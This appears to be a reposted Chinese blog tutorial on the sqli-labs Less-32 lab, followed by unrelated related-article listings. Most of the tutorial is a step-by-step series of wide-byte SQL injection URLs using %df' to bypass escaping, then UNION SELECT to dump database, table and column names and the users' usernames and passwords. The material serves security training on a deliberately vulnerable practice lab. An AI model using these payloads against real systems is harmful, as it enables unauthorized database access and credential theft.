sql_lab之sqli中的宽字节注入（less32）

sql_lab之sqli中的宽字节注入（less32）

article2024/11/15 11:31:17/文章来源:https://blog.csdn.net/qq_59020256/article/details/135164872

宽字节注入（less-32）

1.判断注入类型

http://127.0.0.3/less-32/?id=1

http://127.0.0.3/less-32/?id=1'

出现 \’ 则证明是宽字节注入

2.构成闭环

http://127.0.0.3/less-32/?id=1%df' -- s

显示登录成功则构成闭环

3.查询字段数

http://127.0.0.3/less-32/?id=1%df' order by 4 -- s

http://127.0.0.3/less-32/?id=1%df' order by 3 -- s

说明字段数为3

4.用union联合查询判断回显点

http://127.0.0.3/less-32/?id=-1%df' union select 1,2,3 -- s 记住前面要加 - 因为不加 - 则会正常查询第一个数不会执行联合查询

5.查询数据库名

http://127.0.0.3/less-32/?id=-1%df' union select 1,database(),3 -- s

6.查询表名

http://127.0.0.3/less-32/?id=-1%df' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 -- s

爆出security里面的table表

7.查询字段名

http://127.0.0.3/less-32/?id=-1%df' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 -- s

8.查username和password

http://127.0.0.3/less-32/?id=-1%df' union select 1,group_concat(username),group_concat(password) from users -- s

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/270658.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！

相关文章

SpringMVC：整合 SSM 下篇

SpringMVC：整合 SSM 下篇

文章目录 SpringMVC - 05整合 SSM 下篇一、设计页面1. 首页：index.jsp2. 展示书页面：showBooks.jsp3. 增加书页面：addBook.jsp4. 修改书页面：updateBook.jsp5. 总结二、控制层1. 查询全部书2. 增加书3. 修改书4. 删除书5. 搜索书…

阅读更多...

Leetcode—86.分隔链表【中等】

Leetcode—86.分隔链表【中等】

2023每日刷题（六十九） Leetcode—86.分隔链表实现代码 /*** Definition for singly-linked list.* struct ListNode {* int val;* struct ListNode *next;* };*/ struct ListNode* partition(struct ListNode* head, int x) {struct ListNode…

阅读更多...

Arduino平台软硬件原理及使用——PWM脉宽调制信号的原理及使用

Arduino平台软硬件原理及使用——PWM脉宽调制信号的原理及使用

文章目录： 一、先看百度百科给出的定义及原理二、一图看懂PWM脉宽调制原理三、Arduino中PWM脉宽调制信号的使用一、先看百度百科给出的定义及原理脉冲宽度调制是一种模拟控制方式，根据相应载荷的变化来调制晶体管基极或MOS管栅极的偏置，…

阅读更多...

C预处理 | pragma详解

C预处理 | pragma详解

欢迎关注博主 Mindtechnist 或加入【Linux C/C/Python社区】一起学习和分享Linux、C、C、Python、Matlab，机器人运动控制、多机器人协作，智能优化算法，滤波估计、多传感器信息融合，机器学习，人工智能等相关领域的知识和…

阅读更多...

pci_enable_device()

pci_enable_device()

前言在 PCI 总线下，当 PCIe 设备和 PCIe 驱动匹配后，就会执行驱动的 probe() 函数来初始化设备，以让设备正常运行。在 probe() 函数中，最先做的事情就是执行 pci_enable_device() 来使能设备。如果设备都无法使能的话&#xff…

阅读更多...

MES系统是什么？MES系统的功能有哪些？

MES系统是什么？MES系统的功能有哪些？

在现代制造业的快速发展中，所有规模的企业都面临着类似的挑战：如何提高生产效率、确保产品质量、减少浪费、降低成本，同时迅速响应市场变化。而在这个过程中，传统企业管理往往有以下几个典型痛点： 纸质文件堆叠如山&a…

阅读更多...

框架面试题

框架面试题

文章目录 1. spring中的bean是线程安全的吗2. 事务的实现--AOP3. 项目中用到的AOP4.spring中事务的失效场景5. Bean的生命周期6.spring中的循环引用问题7. springMVC的执行流程8. springboot自动装配原理9. 常见注解10 Mybatis11 Mybatis一二级缓存 1. spring中的bean是线程安全…

阅读更多...

约束-练习题

约束-练习题

练习1 已经存在数据库test04_emp，两张表emp2和dept2 CREATE DATABASE test04_emp; use test04_emp; CREATE TABLE emp2( id INT, emp_name VARCHAR(15) ); CREATE TABLE dept2( id INT, dept_name VARCHAR(15) );题目: 向表emp2的id列中添加PRIMARY KEY约束向表d…

阅读更多...

前端---css 的介绍

前端---css 的介绍

1. css 的定义 css(Cascading Style Sheet)层叠样式表，它是用来美化页面的一种语言。没有使用css的效果图使用css的效果图 2. css 的作用美化界面, 比如: 设置标签文字大小、颜色、字体加粗等样式。控制页面布局, 比如: 设置浮动、定位等样式。 3. css 的基本语…

阅读更多...

【2024 行人重识别最新进展】ReID3D：首个关注激光雷达行人 ReID 的工作！

【2024 行人重识别最新进展】ReID3D：首个关注激光雷达行人 ReID 的工作！

【2024 行人重识别最新进展】ReID3D：首个关注激光雷达行人 ReID 的工作！ 摘要：数据集：方法模型：多任务预训练：ReID Network： 实验结果：结论： 来源：Arxiv 2023…

阅读更多...

[Linux] MySQL数据库之事务

[Linux] MySQL数据库之事务

一、事务的概念事务就是一组数据库操作序列（包含一个或者多个 SQL 操作命令），事务会把所有操作看作是一个不可分割的整体向数据库系统提交或撤消操作，所有操作要么都执行，要么都不执行。事务是一种机制、一个操作序…

阅读更多...

Java 基础学习（十七）多线程高级

Java 基础学习（十七）多线程高级

1 多线程并发安全（续） 1.1 synchronized方法 1.1.1 synchronized方法与同步代码块不同，同步方法将子线程要访问的代码放到一个方法中，在该方法的名称前面加上关键字synchronized即可，这里默认的锁为this&#xff0…

阅读更多...

短视频矩阵系统的崛起和影响

短视频矩阵系统的崛起和影响

近年来，短视频矩阵系统已经成为了社交媒体中的一股新势力。这个新兴的社交媒体形式以其独特的魅力和吸引力，迅速吸引了大量的用户。这个系统简单来说就是将海量短视频整合在一个平台上，使用户可以方便地观看和分享好玩有趣的短视频。短视频…

阅读更多...

测试员有必要转测试开发吗？

测试员有必要转测试开发吗？

为什么很多公司都在招测试开发？ 质量保证和软件稳定性：测试开发人员在软件开发生命周期中扮演着关键的角色，他们负责编写和执行测试代码，以确保软件的质量和稳定性。他们可以帮助发现和修复潜在的问题和缺陷，提高软件…

阅读更多...

短视频矩阵系统源码是如何运作的？

短视频矩阵系统源码是如何运作的？

在当今数字化时代，短视频已经成为人们日常生活中的重要娱乐方式。而为了更好地满足用户需求以及提升使用体验，短视频平台需要依靠一个强大而高效的短视频矩阵系统。那么，这个系统又是如何运作的呢？ 首先，短视频矩阵系…

阅读更多...

[机器人-1]：开源MIT Min cheetah机械狗设计(一)：系统方案及硬件解析

[机器人-1]：开源MIT Min cheetah机械狗设计(一)：系统方案及硬件解析

目录一、MIT Min cheetah机械狗系统设计 1.1 指标需求 1.2 系统框图 1）腿部硬件构成：机械狗每条腿 (共四条腿） 2） 数据通信转换板部分 2 STM32 * 2 CAN * (4 * 3)：FOC算法 3）UP board 计算机板卡硬件…

阅读更多...

【C++】explicit关键字

【C++】explicit关键字

explicit关键字通常用于声明构造，是为了防止编译器进行隐式类型转换。当加上explicit关键字后，只能显示的调用构造函数

阅读更多...

Android---Kotlin 学习009

Android---Kotlin 学习009

继承在 java 里如果一个类没有被 final 关键字修饰，那么它都是可以被继承的。而在 kotlin 中，类默认都是封闭的，要让某个类开放继承，必须使用 open 关键字修饰它，否则会编译报错。此外在子类中，如果要复写…

阅读更多...

09-为Java开疆拓土的ZGC深度剖析

09-为Java开疆拓土的ZGC深度剖析

文章目录引言ZGC出现背景STW带来的问题手机系统(Android) 显示卡顿证券交易系统实时性要求大数据平台(Hadoop集群性能) 垃圾回收器的发展 ZGC介绍ZGC中JVM内存布局和设计为什么这么设计？ ZGC支持NUMA（了解即可） ZGC的核心概念指针着色技术&a…

阅读更多...

智能优化算法应用：基于人工蜂鸟算法3D无线传感器网络(WSN)覆盖优化 - 附代码

智能优化算法应用：基于人工蜂鸟算法3D无线传感器网络(WSN)覆盖优化 - 附代码

智能优化算法应用：基于人工蜂鸟算法3D无线传感器网络(WSN)覆盖优化 - 附代码文章目录智能优化算法应用：基于人工蜂鸟算法3D无线传感器网络(WSN)覆盖优化 - 附代码1.无线传感网络节点模型2.覆盖数学模型及分析3.人工蜂鸟算法4.实验参数设定5.算法结果6.…

阅读更多...

最新文章